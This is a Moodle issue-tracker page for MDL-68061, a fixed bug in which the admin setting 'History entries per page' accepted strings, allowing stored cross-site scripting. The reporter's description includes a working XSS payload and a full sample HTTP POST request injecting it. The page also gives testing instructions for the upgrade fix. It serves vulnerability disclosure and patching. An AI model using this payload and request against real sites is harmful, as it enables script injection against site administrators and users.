Uploaded image for project: 'Moodle'
  1. Moodle
  2. MDL-68061

Grade report history per page config setting should be restricted to int

    XMLWordPrintable

    Details

    • Type: Bug
    • Status: Closed
    • Priority: Minor
    • Resolution: Fixed
    • Affects Version/s: 3.7.4, 3.8.1, 3.9
    • Fix Version/s: 3.7.6, 3.8.3
    • Component/s: Administration
    • Labels:
    • Testing Instructions:
      Hide

      NOTE: This test starts BEFORE the patch is applied.

      Setup

      1. A Moodle site running moodle.git, aka, before patch (ie without this issue patched).

      Testing - strings are updated and no longer allowed

      1. Log into the site as admin.
      2. Navigate to Site administration and search for "History entries per page" (grade_report_historyperpage).
      3. Change the value to "Test" and press "Save changes".
      4. CONFIRM you are allowed to save that value.
      5. Switch to integration.git, aka, after patch (with the patch applied).
      6. Open a new tab and navigate back to Site administration to trigger a site upgrade.
      7. Once the upgrade is completed, go back to the "History entries per page" tab and refresh the page.
      8. CONFIRM the previous value of "Test" has now been replaced by "50".
      9. Attempt to re-set the per page value to "Test" and CONFIRM you receive an error when trying to save the changes.
      10. Set the per page value to "30" and press "Save changes".
      11. CONFIRM the changes are successfully saved.

      Testing - integers are not modified during upgrade

      1. Again, start with a site before patch (ie. without this patch).
      2. Log into the site as admin.
      3. Navigate to Site administration and search for "History entries per page" (grade_report_historyperpage).
      4. Change the value to "30" and press "Save changes".
      5. CONFIRM you are allowed to save that value.
      6. Switch to integration.git, aka, after patch (with the patch applied).
      7. Open a new tab and navigate back to Site administration to trigger a site upgrade.
      8. Navigate back to the "History entries per page" setting.
      9. CONFIRM the setting is still "30", and has not been updated to "50".
      Show
      NOTE: This test starts BEFORE the patch is applied. Setup A Moodle site running moodle.git, aka, before patch (ie without this issue patched). Testing - strings are updated and no longer allowed Log into the site as admin. Navigate to Site administration and search for "History entries per page" ( grade_report_historyperpage ). Change the value to "Test" and press "Save changes". CONFIRM you are allowed to save that value. Switch to integration.git, aka, after patch (with the patch applied). Open a new tab and navigate back to Site administration to trigger a site upgrade. Once the upgrade is completed, go back to the "History entries per page" tab and refresh the page. CONFIRM the previous value of "Test" has now been replaced by "50". Attempt to re-set the per page value to "Test" and CONFIRM you receive an error when trying to save the changes. Set the per page value to "30" and press "Save changes". CONFIRM the changes are successfully saved. Testing - integers are not modified during upgrade Again, start with a site before patch (ie. without this patch). Log into the site as admin. Navigate to Site administration and search for "History entries per page" ( grade_report_historyperpage ). Change the value to "30" and press "Save changes". CONFIRM you are allowed to save that value. Switch to integration.git, aka, after patch (with the patch applied). Open a new tab and navigate back to Site administration to trigger a site upgrade. Navigate back to the "History entries per page" setting. CONFIRM the setting is still "30", and has not been updated to "50".
    • Affected Branches:
      MOODLE_37_STABLE, MOODLE_38_STABLE, MOODLE_39_STABLE
    • Fixed Branches:
      MOODLE_37_STABLE, MOODLE_38_STABLE
    • Pull 3.8 Branch:
    • Pull Master Branch:
      MDL-68061-master
    • Sprint:
      International 3.9 - Sprint 6

      Description

      The application is vulnerable to Stored Cross-Site Scripting (XSS) attack. You can find reproduce steps and sample HTTP Request below.

      Tested Moodle version: 3.8.1+ (the latest)
      Tested browser version: Firefox 73.0.1
      Vulnerable parameter: 's__grade_report_historyperpage' on Grade History Module (/admin/settings.php?section=gradereporthistory)
      Tested payload: <marquee loop=1 width=0 onfinish=alert('Stored-XSS-Test')>

      Reproduce steps:
      1- Go to 'Grade History' module (/admin/settings.php?section=gradereporthistory)
      2- Change the HTTP Post Request's 's__grade_report_historyperpage' parameter with said payload(HTTP Request is attached below).
      3- Go to any log pages to observe the execution, e.g. 'Live logs' page (report/loglive/index.php)

      Sample HTTP Request:

      POST /admin/settings.php?section=gradereporthistory HTTP/1.1
      Host: <REDACTED>
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: en-GB,en;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 182
      Origin: <REDACTED>
      DNT: 1
      Connection: close
      Referer: https://<REDACTED>/admin/settings.php?section=gradereporthistory
      Cookie: MoodleSession=4i<REDACTED>gr
      Upgrade-Insecure-Requests: 1
      section=gradereporthistory&action=save-settings&sesskey=Cr<REDACTED>id&return=&s__grade_report_historyperpage=%3Cmarquee+loop%3D1+width%3D0+onfinish%3Dalert%28%27Stored-XSS-Test%27%29%3E
      
      

       

        Attachments

        1. MDL-68061.jpg
          MDL-68061.jpg
          52 kB
        2. MDL-68061 (2).jpg
          MDL-68061 (2).jpg
          29 kB
        3. Stored XSS.png
          Stored XSS.png
          159 kB

          Activity

            People

            Assignee:
            michaelh Michael Hawkins
            Reporter:
            ea Engin Aslan
            Peer reviewer:
            Simey Lameze
            Integrator:
            Eloy Lafuente (stronk7)
            Tester:
            Anna Carissa Sadia
            Participants:
            Component watchers:
            Andrew Nicols, Jun Pataleta, Michael Hawkins, Shamim Rezaie, Simey Lameze
            Votes:
            0 Vote for this issue
            Watchers:
            6 Start watching this issue

              Dates

              Created:
              Updated:
              Resolved:
              Fix Release Date:
              11/May/20

                Time Tracking

                Estimated:
                Original Estimate - Not Specified
                Not Specified
                Remaining:
                Remaining Estimate - 0 minutes
                0m
                Logged:
                Time Spent - 6 hours, 41 minutes
                6h 41m